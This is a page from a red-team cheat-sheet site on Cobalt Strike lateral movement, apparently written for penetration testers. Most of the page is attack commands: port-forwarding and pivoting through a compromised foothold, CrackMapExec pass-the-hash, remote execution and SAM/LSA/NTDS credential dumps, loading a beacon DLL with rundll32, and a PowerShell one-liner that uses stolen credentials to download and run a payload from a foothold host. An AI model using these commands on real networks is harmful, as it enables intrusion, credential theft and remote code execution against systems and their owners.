🕺
CheatSheets
  • Introduction
  • Getting Started With Hacking
  • VMs on Mac
  • Windows
    • Enumeration
    • Local Privilege Escalation
    • UAC Bypasses
    • Persistance
    • Networking
  • Active Directory
    • Offensive Powershell
    • Enumeration
      • BloodHound
    • Lateral Movement
    • Escalation
      • ACL Abuse
      • Kerberoasting
      • Un-Constrained Delegation
      • JEA
    • Persistance
    • Mimikatz
    • Alternate Cred Dumps
    • MSSQL
    • Defences and Bypasses
    • Setting Up a Lab
  • Red Teaming
    • Phishing Payloads
    • Cobalt Strike
    • Metasploit
    • Sliver
  • Linux
    • Networking
    • Enumeration
    • Local Privilege Escalation
    • Persistance
    • MySQL
  • Mainframes
    • HP Nonstop
    • IBM z/OS
  • Cloud
    • AWS
    • GCP
    • Azure
  • Web App
    • Tomcat
    • SQLMap
    • PHP
  • Mobile
    • Android
    • iOS
  • Exploit-Dev
    • Linux
      • Basic Stack Overflows
      • Bypassing NX (DEP)
      • Bypassing ASLR
    • Shellcode
    • Windows
  • WiFi
    • Alfa AWUS036ACH Setup
    • Aircrack-ng
Powered by GitBook
On this page
  • Lateral Movement
  • Initial Access
  • General Lateral Movment
  • HTTP Shells
  • Double Hop
  • Evil Winrm
  • CrackMapExec
  • Dll
  • Passing Powershell creds
  • General Tips

Was this helpful?

  1. Red Teaming

Cobalt Strike

Lateral Movement

Initial Access

Use HTTP listener and scripted web delivery

General Lateral Movment

Set up an SMB listener and use that when moving with jump command

HTTP Shells

  • Set up a HTTP listener

    • HTTP host is the first target compromised (foothold machine)

    • HTTP Host (Stager) same as above

    • HTTP Port (C2) is 443

  • On foothold machine port forward to teamserver

    • rportfwd 443 <teamserver> 443

  • On foothold machine jump across

    • jump winrm <target> <HTTP listener above>

  • For further hops new listeners and portfwrds need to occur for any machine that cant talk to the foothold directly

Double Hop

When going over winrm and psexec you may encounter double hop issues same as usual.

jump psexec 127.0.0.1 SMB

# After this use spawned session

Evil Winrm

Useful for when you need to pipe through a box that you cant get a beacon on. E.g. applocker

  • Have HTTP listener set up as above (for this named redir) with rportfwd

  • Set up scripted web delivery

    • Local Host = Foothold

    • Local port = 443

    • Listener = redir

    • Type = powershell x64

  • SOCKS proxy through foothold

    • socks 9051

    • proxychains evil-winrm -i <ip> -u Domain\username -p 'Password'

  • Pass creds and launch scripted web delivery on target2

    • Keep WINRM alive for session to stay alive (or migrate to another process)

CrackMapExec

Socks Proxy through as before
# Test login and get hostname 
crackmapexec smb <IP> -u <username> -p <password> [-d <domain>] [--local-auth]

# Pass the hash
crackmapexec smb <IP> -u <username> -H <hash>

# Execute Commands
crackmapexec -u <username> -p <password> -x whoami [--exec-method wmiexec/smbexec/atexec]

# Dumps
crackmapexec smb <ip> -u <username> -p <password> [--lsa] [--sam] [--ntds [vss]]

Dll

rundll32 C:\beacon.dll,Start

Passing Powershell creds

$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami}

General Tips

  • Make_token is only for cleartext passwords

  • Rubeus asktgt doesnt work so well with the /domain flag set

PreviousPhishing PayloadsNextMetasploit

Last updated 1 month ago

Was this helpful?

Use evil-winrm ()

$password = "Password" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\Username",$password); invoke-command -computername TARGET2 -Credential $cred -scriptblock {powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('

https://github.com/Hackplayers/evil-winrm
http://FOOTHOLDIP:443/pivtest'))"}
https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference